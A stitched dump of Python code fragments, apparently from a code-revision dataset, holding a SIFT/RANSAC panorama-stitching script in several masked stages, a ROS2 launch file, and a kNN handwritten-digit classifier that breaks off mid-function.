im\n\n\n<mask token>\n\n\ndef main_3pic():\n dirs = 'MP3_part1_data/' + 'pier/'\n leftimg = readimg(dirs, '1.jpg')\n midimg = readimg(dirs, '2.jpg')\n rightimg = readimg(dirs, '3.jpg')\n leftimgcolor = readimg_color(dirs, '1.jpg')\n midimgcolor = readimg_color(dirs, '2.jpg')\n rightimgcolor = 
readimg_color(dirs, '3.jpg')\n stitched1 = main(leftimg, midimg, leftimgcolor, midimgcolor)\n plt.imshow(stitched1)\n plt.show()\n grey_stitch1 = cv2.cvtColor(stitched1, cv2.COLOR_RGB2GRAY)\n stitched2 = main(grey_stitch1, rightimg, stitched1, rightimgcolor)\n plt.imshow(stitched2)\n plt.show()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef readimg(dirs, imgname):\n img = cv2.imread(dirs + imgname)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n return img\n\n\ndef readimg_color(dirs, imgname):\n img = cv2.imread(dirs + imgname)\n img = cv2.normalize(img.astype('float'), None, 0.0, 1.0, cv2.NORM_MINMAX)\n return img\n\n\ndef sift_descriptor(img):\n sift = cv2.xfeatures2d.SIFT_create()\n kp, dsp = sift.detectAndCompute(img, None)\n return kp, dsp\n\n\ndef show_sift(kp, img):\n copyimg = img.copy()\n copyimg = cv2.drawKeypoints(img, kp, copyimg)\n plt.imshow(copyimg)\n plt.show()\n\n\ndef calculate_distance(kp1, kp2, dsp1, dsp2, num_threshold):\n dist = scipy.spatial.distance.cdist(dsp1, dsp2, 'sqeuclidean')\n idx1 = np.where(dist < num_threshold)[0]\n idx2 = np.where(dist < num_threshold)[1]\n coord1 = np.array([kp1[idx].pt for idx in idx1])\n coord2 = np.array([kp2[idx].pt for idx in idx2])\n match_coords = np.concatenate((coord1, coord2), axis=1)\n return match_coords\n\n\n<mask token>\n\n\ndef compute_H(subset):\n A = []\n for i in range(subset.shape[0]):\n p1 = np.append(subset[i][0:2], 1)\n p2 = np.append(subset[i][2:4], 1)\n row1 = [0, 0, 0, p1[0], p1[1], p1[2], -p2[1] * p1[0], -p2[1] * p1[1\n ], -p2[1] * p1[2]]\n row2 = [p1[0], p1[1], p1[2], 0, 0, 0, -p2[0] * p1[0], -p2[0] * p1[1\n ], -p2[0] * p1[2]]\n A.append(row1)\n A.append(row2)\n A = np.array(A)\n U, s, V = np.linalg.svd(A)\n H = V[len(V) - 1].reshape(3, 3)\n H = H / H[2, 2]\n return H\n\n\ndef show_inlier_matches(img1, img2, inliers):\n print('num of inliers shown in the matching: ' + str(len(inliers)))\n h1, w1 = img1.shape\n h2, w2 = img2.shape\n vis = np.zeros((max(h1, h2), w1 + w2), np.uint8)\n vis[:, :w1] = img1\n vis[:h2, w1:] = img2\n fig, ax = plt.subplots()\n ax.imshow(vis)\n ax.plot([inliers[:, 0], inliers[:, 2] + w1], [inliers[:, 1], inliers[:, 3]]\n )\n plt.show()\n\n\ndef ransac(img1, img2, matches, thres_ransac):\n itertimes = 1000\n inliners = 0\n max_inliners = 0\n for iter in range(0, 
itertimes):\n subset_idx = random.sample(range(matches.shape[0]), k=4)\n subset = matches[subset_idx]\n H = compute_H(subset)\n if np.linalg.matrix_rank(H) < 3:\n continue\n errors = get_errors(matches, H)\n idx = np.where(errors < thres_ransac)[0]\n inlinerspts = matches[idx]\n inliners = len(inlinerspts)\n if inliners >= max_inliners:\n which_inliners = inlinerspts.copy()\n max_inliners = inliners\n best_H = H.copy()\n avg_residual = sum(get_errors(matches[idx], H)) / inliners\n print('num of inliners: ' + str(max_inliners) + ' average residual: ' +\n str(avg_residual))\n show_inlier_matches(img1, img2, which_inliners)\n return best_H\n\n\ndef warp_images(image0, image1, H):\n transform = skimage.transform.ProjectiveTransform(H)\n warp = skimage.transform.warp\n r, c = image1.shape[:2]\n corners = np.array([[0, 0], [0, r], [c, 0], [c, r]])\n warped_corners = transform(corners)\n all_corners = np.vstack((warped_corners, corners))\n corner_min = np.min(all_corners, axis=0)\n corner_max = np.max(all_corners, axis=0)\n output_shape = corner_max - corner_min\n output_shape = np.ceil(output_shape[::-1])\n offset = skimage.transform.SimilarityTransform(translation=-corner_min)\n image0_ = warp(image0, offset.inverse, output_shape=output_shape, cval=-1)\n image1_ = warp(image1, (transform + offset).inverse, output_shape=\n output_shape, cval=-1)\n image0_zeros = warp(image0, offset.inverse, output_shape=output_shape,\n cval=0)\n image1_zeros = warp(image1, (transform + offset).inverse, output_shape=\n output_shape, cval=0)\n overlap = (image0_ != -1.0).astype(int) + (image1_ != -1.0).astype(int)\n overlap += (overlap < 1).astype(int)\n merged = (image0_zeros + image1_zeros) / overlap\n im = Image.fromarray((255 * merged).astype('uint8'), mode='RGB')\n im = np.asarray(im)\n return im\n\n\ndef main(leftimg, rightimg, leftimgcolor, rightimgcolor):\n thres = 9000\n thres_ransac = 1.0\n kp1, dsp1 = sift_descriptor(leftimg)\n kp2, dsp2 = sift_descriptor(rightimg)\n matches = 
calculate_distance(kp1, kp2, dsp1, dsp2, thres)\n H_matrix = ransac(leftimg, rightimg, matches, thres_ransac)\n stitched_img = warp_images(rightimgcolor, leftimgcolor, H_matrix)\n return stitched_img\n\n\n<mask token>\n\n\ndef main_3pic():\n dirs = 'MP3_part1_data/' + 'pier/'\n leftimg = readimg(dirs, '1.jpg')\n midimg = readimg(dirs, '2.jpg')\n rightimg = readimg(dirs, '3.jpg')\n leftimgcolor = readimg_color(dirs, '1.jpg')\n midimgcolor = readimg_color(dirs, '2.jpg')\n rightimgcolor = readimg_color(dirs, '3.jpg')\n stitched1 = main(leftimg, midimg, leftimgcolor, midimgcolor)\n plt.imshow(stitched1)\n plt.show()\n grey_stitch1 = cv2.cvtColor(stitched1, cv2.COLOR_RGB2GRAY)\n stitched2 = main(grey_stitch1, rightimg, stitched1, rightimgcolor)\n plt.imshow(stitched2)\n plt.show()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef readimg(dirs, imgname):\n img = cv2.imread(dirs + imgname)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n return img\n\n\ndef readimg_color(dirs, imgname):\n img = cv2.imread(dirs + imgname)\n img = cv2.normalize(img.astype('float'), None, 0.0, 1.0, cv2.NORM_MINMAX)\n return img\n\n\ndef sift_descriptor(img):\n sift = cv2.xfeatures2d.SIFT_create()\n kp, dsp = sift.detectAndCompute(img, None)\n return kp, dsp\n\n\ndef show_sift(kp, img):\n copyimg = img.copy()\n copyimg = cv2.drawKeypoints(img, kp, copyimg)\n plt.imshow(copyimg)\n plt.show()\n\n\ndef calculate_distance(kp1, kp2, dsp1, dsp2, num_threshold):\n dist = scipy.spatial.distance.cdist(dsp1, dsp2, 'sqeuclidean')\n idx1 = np.where(dist < num_threshold)[0]\n idx2 = np.where(dist < num_threshold)[1]\n coord1 = np.array([kp1[idx].pt for idx in idx1])\n coord2 = np.array([kp2[idx].pt for idx in idx2])\n match_coords = np.concatenate((coord1, coord2), axis=1)\n return match_coords\n\n\ndef get_errors(matches, H):\n num_pairs = len(matches)\n p1 = np.concatenate((matches[:, 0:2], np.ones((1, num_pairs)).T), axis=1)\n p2 = matches[:, 2:4]\n transformed_p1 = np.zeros((num_pairs, 2))\n for i in range(num_pairs):\n transformed_p1[i] = (np.matmul(H, p1[i]) / np.matmul(H, p1[i])[-1])[0:2\n ]\n errors = np.linalg.norm(p2 - transformed_p1, axis=1) ** 2\n return errors\n\n\ndef compute_H(subset):\n A = []\n for i in range(subset.shape[0]):\n p1 = np.append(subset[i][0:2], 1)\n p2 = np.append(subset[i][2:4], 1)\n row1 = [0, 0, 0, p1[0], p1[1], p1[2], -p2[1] * p1[0], -p2[1] * p1[1\n ], -p2[1] * p1[2]]\n row2 = [p1[0], p1[1], p1[2], 0, 0, 0, -p2[0] * p1[0], -p2[0] * p1[1\n ], -p2[0] * p1[2]]\n A.append(row1)\n A.append(row2)\n A = np.array(A)\n U, s, V = np.linalg.svd(A)\n H = V[len(V) - 1].reshape(3, 3)\n H = H / H[2, 2]\n return H\n\n\ndef show_inlier_matches(img1, img2, inliers):\n print('num of inliers shown in the matching: ' + str(len(inliers)))\n h1, w1 = img1.shape\n h2, w2 = 
img2.shape\n vis = np.zeros((max(h1, h2), w1 + w2), np.uint8)\n vis[:, :w1] = img1\n vis[:h2, w1:] = img2\n fig, ax = plt.subplots()\n ax.imshow(vis)\n ax.plot([inliers[:, 0], inliers[:, 2] + w1], [inliers[:, 1], inliers[:, 3]]\n )\n plt.show()\n\n\ndef ransac(img1, img2, matches, thres_ransac):\n itertimes = 1000\n inliners = 0\n max_inliners = 0\n for iter in range(0, itertimes):\n subset_idx = random.sample(range(matches.shape[0]), k=4)\n subset = matches[subset_idx]\n H = compute_H(subset)\n if np.linalg.matrix_rank(H) < 3:\n continue\n errors = get_errors(matches, H)\n idx = np.where(errors < thres_ransac)[0]\n inlinerspts = matches[idx]\n inliners = len(inlinerspts)\n if inliners >= max_inliners:\n which_inliners = inlinerspts.copy()\n max_inliners = inliners\n best_H = H.copy()\n avg_residual = sum(get_errors(matches[idx], H)) / inliners\n print('num of inliners: ' + str(max_inliners) + ' average residual: ' +\n str(avg_residual))\n show_inlier_matches(img1, img2, which_inliners)\n return best_H\n\n\ndef warp_images(image0, image1, H):\n transform = skimage.transform.ProjectiveTransform(H)\n warp = skimage.transform.warp\n r, c = image1.shape[:2]\n corners = np.array([[0, 0], [0, r], [c, 0], [c, r]])\n warped_corners = transform(corners)\n all_corners = np.vstack((warped_corners, corners))\n corner_min = np.min(all_corners, axis=0)\n corner_max = np.max(all_corners, axis=0)\n output_shape = corner_max - corner_min\n output_shape = np.ceil(output_shape[::-1])\n offset = skimage.transform.SimilarityTransform(translation=-corner_min)\n image0_ = warp(image0, offset.inverse, output_shape=output_shape, cval=-1)\n image1_ = warp(image1, (transform + offset).inverse, output_shape=\n output_shape, cval=-1)\n image0_zeros = warp(image0, offset.inverse, output_shape=output_shape,\n cval=0)\n image1_zeros = warp(image1, (transform + offset).inverse, output_shape=\n output_shape, cval=0)\n overlap = (image0_ != -1.0).astype(int) + (image1_ != -1.0).astype(int)\n overlap 
+= (overlap < 1).astype(int)\n merged = (image0_zeros + image1_zeros) / overlap\n im = Image.fromarray((255 * merged).astype('uint8'), mode='RGB')\n im = np.asarray(im)\n return im\n\n\ndef main(leftimg, rightimg, leftimgcolor, rightimgcolor):\n thres = 9000\n thres_ransac = 1.0\n kp1, dsp1 = sift_descriptor(leftimg)\n kp2, dsp2 = sift_descriptor(rightimg)\n matches = calculate_distance(kp1, kp2, dsp1, dsp2, thres)\n H_matrix = ransac(leftimg, rightimg, matches, thres_ransac)\n stitched_img = warp_images(rightimgcolor, leftimgcolor, H_matrix)\n return stitched_img\n\n\ndef main_2pic():\n dirs = 'MP3_part1_data/' + 'park/'\n leftimg = readimg(dirs, 'left.jpg')\n rightimg = readimg(dirs, 'right.jpg')\n leftimgcolor = readimg_color(dirs, 'left.jpg')\n rightimgcolor = readimg_color(dirs, 'right.jpg')\n stitched_img = main(leftimg, rightimg, leftimgcolor, rightimgcolor)\n plt.imshow(stitched_img)\n plt.show()\n\n\ndef main_3pic():\n dirs = 'MP3_part1_data/' + 'pier/'\n leftimg = readimg(dirs, '1.jpg')\n midimg = readimg(dirs, '2.jpg')\n rightimg = readimg(dirs, '3.jpg')\n leftimgcolor = readimg_color(dirs, '1.jpg')\n midimgcolor = readimg_color(dirs, '2.jpg')\n rightimgcolor = readimg_color(dirs, '3.jpg')\n stitched1 = main(leftimg, midimg, leftimgcolor, midimgcolor)\n plt.imshow(stitched1)\n plt.show()\n grey_stitch1 = cv2.cvtColor(stitched1, cv2.COLOR_RGB2GRAY)\n stitched2 = main(grey_stitch1, rightimg, stitched1, rightimgcolor)\n plt.imshow(stitched2)\n plt.show()\n\n\nif __name__ == '__main__':\n main_3pic()\n",
"step-4": "import time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\nimport matplotlib.image as mpimg\nimport random\nimport skimage\nimport scipy\nfrom PIL import Image\n\n\ndef readimg(dirs, imgname):\n img = cv2.imread(dirs + imgname)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n return img\n\n\ndef readimg_color(dirs, imgname):\n img = cv2.imread(dirs + imgname)\n img = cv2.normalize(img.astype('float'), None, 0.0, 1.0, cv2.NORM_MINMAX)\n return img\n\n\ndef sift_descriptor(img):\n sift = cv2.xfeatures2d.SIFT_create()\n kp, dsp = sift.detectAndCompute(img, None)\n return kp, dsp\n\n\ndef show_sift(kp, img):\n copyimg = img.copy()\n copyimg = cv2.drawKeypoints(img, kp, copyimg)\n plt.imshow(copyimg)\n plt.show()\n\n\ndef calculate_distance(kp1, kp2, dsp1, dsp2, num_threshold):\n dist = scipy.spatial.distance.cdist(dsp1, dsp2, 'sqeuclidean')\n idx1 = np.where(dist < num_threshold)[0]\n idx2 = np.where(dist < num_threshold)[1]\n coord1 = np.array([kp1[idx].pt for idx in idx1])\n coord2 = np.array([kp2[idx].pt for idx in idx2])\n match_coords = np.concatenate((coord1, coord2), axis=1)\n return match_coords\n\n\ndef get_errors(matches, H):\n num_pairs = len(matches)\n p1 = np.concatenate((matches[:, 0:2], np.ones((1, num_pairs)).T), axis=1)\n p2 = matches[:, 2:4]\n transformed_p1 = np.zeros((num_pairs, 2))\n for i in range(num_pairs):\n transformed_p1[i] = (np.matmul(H, p1[i]) / np.matmul(H, p1[i])[-1])[0:2\n ]\n errors = np.linalg.norm(p2 - transformed_p1, axis=1) ** 2\n return errors\n\n\ndef compute_H(subset):\n A = []\n for i in range(subset.shape[0]):\n p1 = np.append(subset[i][0:2], 1)\n p2 = np.append(subset[i][2:4], 1)\n row1 = [0, 0, 0, p1[0], p1[1], p1[2], -p2[1] * p1[0], -p2[1] * p1[1\n ], -p2[1] * p1[2]]\n row2 = [p1[0], p1[1], p1[2], 0, 0, 0, -p2[0] * p1[0], -p2[0] * p1[1\n ], -p2[0] * p1[2]]\n A.append(row1)\n A.append(row2)\n A = np.array(A)\n U, s, V = np.linalg.svd(A)\n H = V[len(V) - 1].reshape(3, 3)\n H = H / H[2, 2]\n return 
H\n\n\ndef show_inlier_matches(img1, img2, inliers):\n print('num of inliers shown in the matching: ' + str(len(inliers)))\n h1, w1 = img1.shape\n h2, w2 = img2.shape\n vis = np.zeros((max(h1, h2), w1 + w2), np.uint8)\n vis[:, :w1] = img1\n vis[:h2, w1:] = img2\n fig, ax = plt.subplots()\n ax.imshow(vis)\n ax.plot([inliers[:, 0], inliers[:, 2] + w1], [inliers[:, 1], inliers[:, 3]]\n )\n plt.show()\n\n\ndef ransac(img1, img2, matches, thres_ransac):\n itertimes = 1000\n inliners = 0\n max_inliners = 0\n for iter in range(0, itertimes):\n subset_idx = random.sample(range(matches.shape[0]), k=4)\n subset = matches[subset_idx]\n H = compute_H(subset)\n if np.linalg.matrix_rank(H) < 3:\n continue\n errors = get_errors(matches, H)\n idx = np.where(errors < thres_ransac)[0]\n inlinerspts = matches[idx]\n inliners = len(inlinerspts)\n if inliners >= max_inliners:\n which_inliners = inlinerspts.copy()\n max_inliners = inliners\n best_H = H.copy()\n avg_residual = sum(get_errors(matches[idx], H)) / inliners\n print('num of inliners: ' + str(max_inliners) + ' average residual: ' +\n str(avg_residual))\n show_inlier_matches(img1, img2, which_inliners)\n return best_H\n\n\ndef warp_images(image0, image1, H):\n transform = skimage.transform.ProjectiveTransform(H)\n warp = skimage.transform.warp\n r, c = image1.shape[:2]\n corners = np.array([[0, 0], [0, r], [c, 0], [c, r]])\n warped_corners = transform(corners)\n all_corners = np.vstack((warped_corners, corners))\n corner_min = np.min(all_corners, axis=0)\n corner_max = np.max(all_corners, axis=0)\n output_shape = corner_max - corner_min\n output_shape = np.ceil(output_shape[::-1])\n offset = skimage.transform.SimilarityTransform(translation=-corner_min)\n image0_ = warp(image0, offset.inverse, output_shape=output_shape, cval=-1)\n image1_ = warp(image1, (transform + offset).inverse, output_shape=\n output_shape, cval=-1)\n image0_zeros = warp(image0, offset.inverse, output_shape=output_shape,\n cval=0)\n image1_zeros = 
warp(image1, (transform + offset).inverse, output_shape=\n output_shape, cval=0)\n overlap = (image0_ != -1.0).astype(int) + (image1_ != -1.0).astype(int)\n overlap += (overlap < 1).astype(int)\n merged = (image0_zeros + image1_zeros) / overlap\n im = Image.fromarray((255 * merged).astype('uint8'), mode='RGB')\n im = np.asarray(im)\n return im\n\n\ndef main(leftimg, rightimg, leftimgcolor, rightimgcolor):\n thres = 9000\n thres_ransac = 1.0\n kp1, dsp1 = sift_descriptor(leftimg)\n kp2, dsp2 = sift_descriptor(rightimg)\n matches = calculate_distance(kp1, kp2, dsp1, dsp2, thres)\n H_matrix = ransac(leftimg, rightimg, matches, thres_ransac)\n stitched_img = warp_images(rightimgcolor, leftimgcolor, H_matrix)\n return stitched_img\n\n\ndef main_2pic():\n dirs = 'MP3_part1_data/' + 'park/'\n leftimg = readimg(dirs, 'left.jpg')\n rightimg = readimg(dirs, 'right.jpg')\n leftimgcolor = readimg_color(dirs, 'left.jpg')\n rightimgcolor = readimg_color(dirs, 'right.jpg')\n stitched_img = main(leftimg, rightimg, leftimgcolor, rightimgcolor)\n plt.imshow(stitched_img)\n plt.show()\n\n\ndef main_3pic():\n dirs = 'MP3_part1_data/' + 'pier/'\n leftimg = readimg(dirs, '1.jpg')\n midimg = readimg(dirs, '2.jpg')\n rightimg = readimg(dirs, '3.jpg')\n leftimgcolor = readimg_color(dirs, '1.jpg')\n midimgcolor = readimg_color(dirs, '2.jpg')\n rightimgcolor = readimg_color(dirs, '3.jpg')\n stitched1 = main(leftimg, midimg, leftimgcolor, midimgcolor)\n plt.imshow(stitched1)\n plt.show()\n grey_stitch1 = cv2.cvtColor(stitched1, cv2.COLOR_RGB2GRAY)\n stitched2 = main(grey_stitch1, rightimg, stitched1, rightimgcolor)\n plt.imshow(stitched2)\n plt.show()\n\n\nif __name__ == '__main__':\n main_3pic()\n",
"step-5": "import time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\nimport matplotlib.image as mpimg\nimport random\nimport skimage\nimport scipy\nfrom PIL import Image\n\ndef readimg(dirs, imgname):\n img = cv2.imread(dirs + imgname)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n return img\n\ndef readimg_color(dirs, imgname):\n img = cv2.imread(dirs + imgname)\n img = cv2.normalize(img.astype('float'), None, 0.0, 1.0, cv2.NORM_MINMAX)\n return img\n\ndef sift_descriptor(img):\n sift = cv2.xfeatures2d.SIFT_create()\n kp, dsp = sift.detectAndCompute(img, None)\n\n return kp, dsp\n\ndef show_sift(kp, img):\n # show the img with descriptors\n copyimg = img.copy()\n copyimg = cv2.drawKeypoints(img, kp, copyimg)\n plt.imshow(copyimg)\n plt.show()\n\ndef calculate_distance(kp1, kp2, dsp1, dsp2, num_threshold):\n # fast computation of Euclidean distance between each descriptors\n dist = scipy.spatial.distance.cdist(dsp1, dsp2, 'sqeuclidean')\n # find the matching coordinates\n idx1 = np.where(dist < num_threshold)[0]\n idx2 = np.where(dist < num_threshold)[1]\n coord1 = np.array([kp1[idx].pt for idx in idx1])\n coord2 = np.array([kp2[idx].pt for idx in idx2])\n # put into pairs of coords\n match_coords = np.concatenate((coord1, coord2), axis=1)\n\n return match_coords\n\ndef get_errors(matches, H):\n\t# difference between original img2 points and transformed img1 points with H\n num_pairs = len(matches)\n # all matching points in img1\n p1 = np.concatenate((matches[:, 0:2], np.ones((1, num_pairs)).T), axis=1)\n # all matching points in img2\n p2 = matches[:, 2:4]\n\n # Transform every point in p1 to estimate p2.\n transformed_p1 = np.zeros((num_pairs, 2))\n for i in range(num_pairs):\n transformed_p1[i] = (np.matmul(H, p1[i]) / np.matmul(H, p1[i])[-1])[0:2]\n\n # Compute error of each matching pair\n errors = np.linalg.norm(p2 - transformed_p1, axis=1) ** 2\n return errors\n\ndef compute_H(subset):\n # calculate the fitted homography\n A = []\n\n 
for i in range(subset.shape[0]):\n p1 = np.append(subset[i][0:2], 1)\n p2 = np.append(subset[i][2:4], 1)\n \n row1 = [0, 0, 0, p1[0], p1[1], p1[2], -p2[1]*p1[0], -p2[1]*p1[1], -p2[1]*p1[2]]\n row2 = [p1[0], p1[1], p1[2], 0, 0, 0, -p2[0]*p1[0], -p2[0]*p1[1], -p2[0]*p1[2]]\n A.append(row1)\n A.append(row2)\n\n A = np.array(A)\n\n U, s, V = np.linalg.svd(A)\n H = V[len(V)-1].reshape(3, 3)\n\n # normalize\n H = H / H[2, 2]\n return H\n\ndef show_inlier_matches(img1, img2, inliers):\n print(\"num of inliers shown in the matching: \" + str(len(inliers)))\n h1, w1 = img1.shape\n h2, w2 = img2.shape\n\n vis = np.zeros((max(h1, h2), w1 + w2), np.uint8)\n vis[:, :w1] = img1\n vis[:h2, w1:] = img2\n\n fig, ax = plt.subplots()\n ax.imshow(vis)\n ax.plot([inliers[:,0], inliers[:,2] + w1],[inliers[:,1], inliers[:,3]])\n plt.show()\n\ndef ransac(img1, img2, matches, thres_ransac):\n itertimes = 1000\n inliners = 0\n max_inliners = 0\n\n for iter in range(0, itertimes):\n subset_idx = random.sample(range(matches.shape[0]), k=4)\n subset = matches[subset_idx]\n\n H = compute_H(subset)\n\n # check if it is full rank\n if np.linalg.matrix_rank(H) < 3:\n continue\n\n # the norm of error caused if we choose the above subset\n errors = get_errors(matches, H)\n idx = np.where(errors < thres_ransac)[0]\n inlinerspts = matches[idx]\n\n # find the best number of inliners \n inliners = len(inlinerspts)\n if inliners >= max_inliners:\n which_inliners = inlinerspts.copy()\n max_inliners = inliners\n best_H = H.copy()\n \n avg_residual = sum(get_errors(matches[idx], H)) / inliners\n\n print(\"num of inliners: \" + str(max_inliners) + \" average residual: \" + str(avg_residual))\n show_inlier_matches(img1, img2, which_inliners)\n return best_H\n\n# function provided by Maghav at Piazza @450\ndef warp_images(image0, image1, H):\n transform = skimage.transform.ProjectiveTransform(H)\n warp = skimage.transform.warp\n\n r, c = image1.shape[:2]\n # Note that transformations take coordinates in (x, y) 
format,\n # not (row, column), in order to be consistent with most literature\n corners = np.array([[0, 0],\n [0, r],\n [c, 0],\n [c, r]])\n\n # Warp the image corners to their new positions\n warped_corners = transform(corners)\n\n # Find the extents of both the reference image and the warped\n # target image\n all_corners = np.vstack((warped_corners, corners))\n\n corner_min = np.min(all_corners, axis=0)\n corner_max = np.max(all_corners, axis=0)\n\n output_shape = (corner_max - corner_min)\n output_shape = np.ceil(output_shape[::-1])\n\n offset = skimage.transform.SimilarityTransform(translation=-corner_min)\n\n image0_ = warp(image0, offset.inverse, output_shape=output_shape, cval=-1)\n\n image1_ = warp(image1, (transform + offset).inverse, output_shape=output_shape, cval=-1)\n\n image0_zeros = warp(image0, offset.inverse, output_shape=output_shape, cval=0)\n\n image1_zeros = warp(image1, (transform + offset).inverse, output_shape=output_shape, cval=0)\n\n overlap = (image0_ != -1.0 ).astype(int) + (image1_ != -1.0).astype(int)\n overlap += (overlap < 1).astype(int)\n merged = (image0_zeros+image1_zeros)/overlap\n\n im = Image.fromarray((255*merged).astype('uint8'), mode='RGB')\n im = np.asarray(im)\n\n return im\n\ndef main(leftimg, rightimg, leftimgcolor, rightimgcolor):\n # using 7000, 0.5 for 2 pic; 9000, 1.0 for 3 pic\n thres = 9000\n thres_ransac = 1.0\n\n kp1, dsp1 = sift_descriptor(leftimg)\n kp2, dsp2 = sift_descriptor(rightimg)\n\n # get all matching points\n matches = calculate_distance(kp1, kp2, dsp1, dsp2, thres)\n\n H_matrix = ransac(leftimg, rightimg, matches, thres_ransac)\n\n stitched_img = warp_images(rightimgcolor, leftimgcolor, H_matrix)\n\n return stitched_img\n\ndef main_2pic():\n dirs = 'MP3_part1_data/' + 'park/'\n leftimg = readimg(dirs, 'left.jpg')\n rightimg = readimg(dirs, 'right.jpg')\n leftimgcolor = readimg_color(dirs, 'left.jpg')\n rightimgcolor = readimg_color(dirs, 'right.jpg')\n\n stitched_img = main(leftimg, rightimg, 
leftimgcolor, rightimgcolor)\n\n plt.imshow(stitched_img)\n plt.show()\n\ndef main_3pic():\n dirs = 'MP3_part1_data/' + 'pier/' # ledge pier hill\n leftimg = readimg(dirs, '1.jpg')\n midimg = readimg(dirs, '2.jpg')\n rightimg = readimg(dirs, '3.jpg')\n leftimgcolor = readimg_color(dirs, '1.jpg')\n midimgcolor = readimg_color(dirs, '2.jpg')\n rightimgcolor = readimg_color(dirs, '3.jpg')\n\n stitched1 = main(leftimg, midimg, leftimgcolor, midimgcolor)\n\n plt.imshow(stitched1)\n plt.show()\n\n grey_stitch1 = cv2.cvtColor(stitched1, cv2.COLOR_RGB2GRAY)\n\n stitched2 = main(grey_stitch1, rightimg, stitched1, rightimgcolor)\n\n plt.imshow(stitched2)\n plt.show()\n\nif __name__ == '__main__':\n\t#main_2pic()\n\tmain_3pic()\n \n",
"step-ids": [
9,
11,
14,
15,
16
]
}
|
[
9,
11,
14,
15,
16
] |
from launch import LaunchDescription
from launch_ros.actions import Node
import os
# Absolute path to the node's parameter file.  'INSERT_PATH' is a placeholder
# that must be replaced with the workspace root before launching.
params = os.path.join('INSERT_PATH/src/beckhoff_ros', 'config', 'params.yaml')
def generate_launch_description():
    """Build the launch description that starts the beckhoff_ros node."""
    beckhoff_node = Node(
        package='beckhoff_ros',
        executable='beckhoff_ros_node',
        name='beckhoff_ros_node',
        parameters=[params],
        output='screen',
    )
    return LaunchDescription([beckhoff_node])
|
normal
|
{
"blob_id": "ae4f8eb71939ff212d05d12f65edeaecf66f2205",
"index": 4874,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef generate_launch_description():\n return LaunchDescription([Node(package='beckhoff_ros', executable=\n 'beckhoff_ros_node', name='beckhoff_ros_node', parameters=[params],\n output='screen')])\n",
"step-3": "<mask token>\nparams = os.path.join('INSERT_PATH/src/beckhoff_ros', 'config', 'params.yaml')\n\n\ndef generate_launch_description():\n return LaunchDescription([Node(package='beckhoff_ros', executable=\n 'beckhoff_ros_node', name='beckhoff_ros_node', parameters=[params],\n output='screen')])\n",
"step-4": "from launch import LaunchDescription\nfrom launch_ros.actions import Node\nimport os\nparams = os.path.join('INSERT_PATH/src/beckhoff_ros', 'config', 'params.yaml')\n\n\ndef generate_launch_description():\n return LaunchDescription([Node(package='beckhoff_ros', executable=\n 'beckhoff_ros_node', name='beckhoff_ros_node', parameters=[params],\n output='screen')])\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from . import chequeador_camion
from . import chequeador_camion_modelo
from . import chequeador_destino_tipo
from . import chequeador_destino
from . import chequeador_origen
from . import chequeador_minerales
|
flexible
|
{
"blob_id": "bf7319996043a41b7d0ef4e6098c3609e5db101e",
"index": 9809,
"step-1": "<mask token>\n",
"step-2": "from . import chequeador_camion\nfrom . import chequeador_camion_modelo\nfrom . import chequeador_destino_tipo\nfrom . import chequeador_destino\nfrom . import chequeador_origen\nfrom . import chequeador_minerales\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
'''
Handwriting recognition system.

Builds a kNN-based digit recogniser over 32x32 binary bitmaps; just call
getResult() with an image path and a training-set directory.
'''
import operator
from numpy import *
from PIL import Image
from os import listdir
from io import BytesIO
def classify(inX, dataSet, labels, k):
    """Classify inX by a majority vote among its k nearest training samples.

    Args:
        inX: the feature vector to classify.
        dataSet: (m, d) array of training vectors, one per row.
        labels: sequence of m class labels, aligned with dataSet rows.
        k: number of neighbours to vote.

    Returns:
        The label that received the most votes among the k neighbours.
    """
    n_samples = dataSet.shape[0]
    # Euclidean distance from inX to every training row.
    deltas = tile(inX, (n_samples, 1)) - dataSet
    dists = ((deltas ** 2).sum(axis=1)) ** 0.5
    vote_counts = {}
    # argsort gives row indices ordered by increasing distance.
    for neighbour in dists.argsort()[:k]:
        label = labels[neighbour]
        vote_counts[label] = vote_counts.get(label, 0) + 1
    ranked = sorted(vote_counts.items(),
                    key=operator.itemgetter(1), reverse=True)
    return ranked[0][0]
# Convert a bitmap text file into a row vector.
def img2vector(filename):
    """Read a 32x32 text bitmap of '0'/'1' characters into a 1x1024 vector.

    Args:
        filename: path to a file with 32 lines of 32 digit characters.

    Returns:
        A (1, 1024) float array whose entries are the bitmap read row-major.
    """
    returnVect = zeros((1, 1024))
    # 'with' ensures the handle is closed even on a malformed file
    # (the original left the file open).
    with open(filename) as fr:
        for i in range(32):
            lineStr = fr.readline()
            for j in range(32):
                returnVect[0, 32 * i + j] = int(lineStr[j])
    return returnVect
'''
TODO: make the training-set loading run only once instead of re-reading the
whole directory on every call to getResult().
'''
# Backward-compatible module-level placeholders.  NOTE: they are no longer
# mutated — the old code appended labels into the global hwLabels, so a
# second loadTrainingSet() call left stale labels that no longer lined up
# with the freshly rebuilt matrix.
hwLabels , trainingMat = [] , []


def loadTrainingSet(dir_trainingSet):
    """Load every training sample found in dir_trainingSet.

    Files are named '<digit>_<index>.txt', each holding a 32x32 '0'/'1'
    bitmap (see img2vector).

    Args:
        dir_trainingSet: directory containing the training bitmaps.

    Returns:
        (labels, trainingMat): labels[i] is the digit encoded in the i-th
        file name; trainingMat is an (m, 1024) array whose i-th row is the
        flattened bitmap of that file.
    """
    print('把trainingDigits文件夹里的所有训练集导入')
    trainingFileList = listdir(dir_trainingSet)
    m = len(trainingFileList)
    labels = []                      # local, so repeated calls stay consistent
    trainingMat = zeros((m, 1024))
    for i in range(m):
        fileNameStr = trainingFileList[i]
        # '3_12.txt' -> label 3 (the digit before the first underscore).
        labels.append(int(fileNameStr.split('.')[0].split('_')[0]))
